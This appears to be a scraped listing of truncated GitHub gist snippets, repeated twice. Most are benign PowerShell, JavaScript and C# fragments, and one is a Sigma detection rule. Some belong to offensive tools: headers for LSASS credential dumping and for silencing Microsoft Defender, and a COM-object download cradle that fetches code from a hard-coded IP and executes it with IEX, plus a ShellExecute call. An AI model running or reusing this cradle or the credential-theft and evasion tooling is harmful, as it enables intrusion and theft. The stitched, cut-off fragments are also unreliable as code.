dcgithub

## rdphistory.ps1
$LogName = 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational'
$Results = @()
$Events = Get-WinEvent -LogName $LogName
foreach ($Event in $Events) {
    $EventXml = [xml]$Event.ToXML()

    $ResultHash = @{
        Time        = $Event.TimeCreated.ToString()
        'Event ID'  = $Event.Id
        'Desc'      = ($Event.Message -split "`n")[0]

## SuperHidden.ps1
<#
.SYNOPSIS
   Query\Create\Delete super hidden system folders

   Author: @r00t-3xp10it
   Tested Under: Windows 10 (19043) x64 bits
   Required Dependencies: attrib {native}
   Optional Dependencies: none
   PS cmdlet Dev version: v1.2.18

## Microsoft Office Product Spawning Windows Shell.yml
title: Microsoft Office Product Spawning Windows Shell
id: 438025f9-5856-4663-83f7-52f878a70a50
status: experimental
description: Detects a Windows command and scripting interpreter executable started from Microsoft Word, Excel, Powerpoint, Publisher and Visio
references:
    - https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100
    - https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html
tags:
    - attack.execution
    - attack.t1204          # an old one

## DefaultBrowser.cs
using System;
using System.IO;
using System.Diagnostics;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Runtime.InteropServices;
using Microsoft.Win32;

## run-in-console.js
// Run this in the console at https://midi.amitszone.com/LPP_LIGHTSHOW_BUILDER/
// to get it to work with the Launchpad Mini Mk3. It may work with other new
// Launchpads, I'm not sure (If it does, comment below, thanks!)

(() => {
  // Create mapping of Launchpad Pro -> Mini Mk3 notes
  // (This is only the mapping for the 8x8 grid area)
  const noteMap = {}
  for (let i = 1; i <= 8; i++) {
    for (let j = 1; j <= 8; j++) {

## ConvertTo-AnimatedGif.ps1
function ConvertTo-AnimatedGif {
    param (
        [string]$VideoFilePath = $(Read-Host -Prompt 'Enter a video file path.'),
        [int]$FramePerSeconds = 10,
        [int]$Scale = 320,
        [switch]$Verbose
    )

    $ffmpegCommand = (Get-Command -ErrorAction Ignore 'ffmpeg.exe')

## DumpLsass.ps1
<#
.SYNOPSIS
   Dump Lsass.exe process memory to retrieve credentials!

   Author: @r00t-3xp10it
   Mitre : T1003 (lolbas)
   Tested Under: Windows 10 (19042) x64 bits
   Required Dependencies: Admin privs, rundll32.exe, comsvcs.dll
   Optional Dependencies: cmd, Invoke-WebRequest
   PS cmdlet Dev version: v1.0.7

## Abusing COM & DCOM objects.ps1
https://www.exploit-db.com/docs/48767

Msxml2.XMLHTTP.3.0
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221")); $o.Open("GET", "http://87.236.212.22:443/xsllsx", $False); $o.Send(); IEX $o.responseText;

ShellWindows
$hb = [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39"))
$item = $hb.Item()
$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","c:\windows\system32",$null,0)

## SilenceDefender_ATP.ps1
<#
.SYNOPSIS
   Silencing microsoft defender using firewall rules!

   Author: @r00t-3xp10it
   Credits to: csis-techblog
   Tested Under: Windows 10 (19042) x64 bits
   Required Dependencies: Administrator privileges
   Optional Dependencies: none
   PS cmdlet Dev version: v1.0.6

## switchCase.js
/**
 * Switches the case of alpha characters in a given string such that A becomes
 * a, j becomes J, and 5 remains 5.
 * @param {string} input The string to switch cases on.
 * @return {string} the string with the capitalization of all alpha characters
 *     inverted.
 */
const switchCase = (input) => {
  return input.split('').map((c) => {
    return c.toUpperCase() === c ? c.toLowerCase() : c.toUpperCase();
	$LogName = 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational'
	$Results = @()
	$Events = Get-WinEvent -LogName $LogName
	foreach ($Event in $Events) {
	$EventXml = [xml]$Event.ToXML()

	$ResultHash = @{
	Time = $Event.TimeCreated.ToString()
	'Event ID' = $Event.Id
	'Desc' = ($Event.Message -split "`n")[0]
	<#
	.SYNOPSIS
	Query\Create\Delete super hidden system folders

	Author: @r00t-3xp10it
	Tested Under: Windows 10 (19043) x64 bits
	Required Dependencies: attrib {native}
	Optional Dependencies: none
	PS cmdlet Dev version: v1.2.18
	title: Microsoft Office Product Spawning Windows Shell
	id: 438025f9-5856-4663-83f7-52f878a70a50
	status: experimental
	description: Detects a Windows command and scripting interpreter executable started from Microsoft Word, Excel, Powerpoint, Publisher and Visio
	references:
	- https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100
	- https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html
	tags:
	- attack.execution
	- attack.t1204 # an old one
	using System;
	using System.IO;
	using System.Diagnostics;
	using System.Collections.Generic;
	using System.Linq;
	using System.Text;
	using System.Threading.Tasks;
	using System.Runtime.InteropServices;
	using Microsoft.Win32;
	// Run this in the console at https://midi.amitszone.com/LPP_LIGHTSHOW_BUILDER/
	// to get it to work with the Launchpad Mini Mk3. It may work with other new
	// Launchpads, I'm not sure (If it does, comment below, thanks!)

	(() => {
	// Create mapping of Launchpad Pro -> Mini Mk3 notes
	// (This is only the mapping for the 8x8 grid area)
	const noteMap = {}
	for (let i = 1; i <= 8; i++) {
	for (let j = 1; j <= 8; j++) {
	function ConvertTo-AnimatedGif {
	param (
	[string]$VideoFilePath = $(Read-Host -Prompt 'Enter a video file path.'),
	[int]$FramePerSeconds = 10,
	[int]$Scale = 320,
	[switch]$Verbose
	)

	$ffmpegCommand = (Get-Command -ErrorAction Ignore 'ffmpeg.exe')
	<#
	.SYNOPSIS
	Dump Lsass.exe process memory to retrieve credentials!

	Author: @r00t-3xp10it
	Mitre : T1003 (lolbas)
	Tested Under: Windows 10 (19042) x64 bits
	Required Dependencies: Admin privs, rundll32.exe, comsvcs.dll
	Optional Dependencies: cmd, Invoke-WebRequest
	PS cmdlet Dev version: v1.0.7
	https://www.exploit-db.com/docs/48767

	Msxml2.XMLHTTP.3.0
	$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221")); $o.Open("GET", "http://87.236.212.22:443/xsllsx", $False); $o.Send(); IEX $o.responseText;

	ShellWindows
	$hb = [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39"))
	$item = $hb.Item()
	$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","c:\windows\system32",$null,0)
	<#
	.SYNOPSIS
	Silencing microsoft defender using firewall rules!

	Author: @r00t-3xp10it
	Credits to: csis-techblog
	Tested Under: Windows 10 (19042) x64 bits
	Required Dependencies: Administrator privileges
	Optional Dependencies: none
	PS cmdlet Dev version: v1.0.6
	/**
	* Switches the case of alpha characters in a given string such that A becomes
	* a, j becomes J, and 5 remains 5.
	* @param {string} input The string to switch cases on.
	* @return {string} the string with the capitalization of all alpha characters
	* inverted.
	*/
	const switchCase = (input) => {
	return input.split('').map((c) => {
	return c.toUpperCase() === c ? c.toLowerCase() : c.toUpperCase();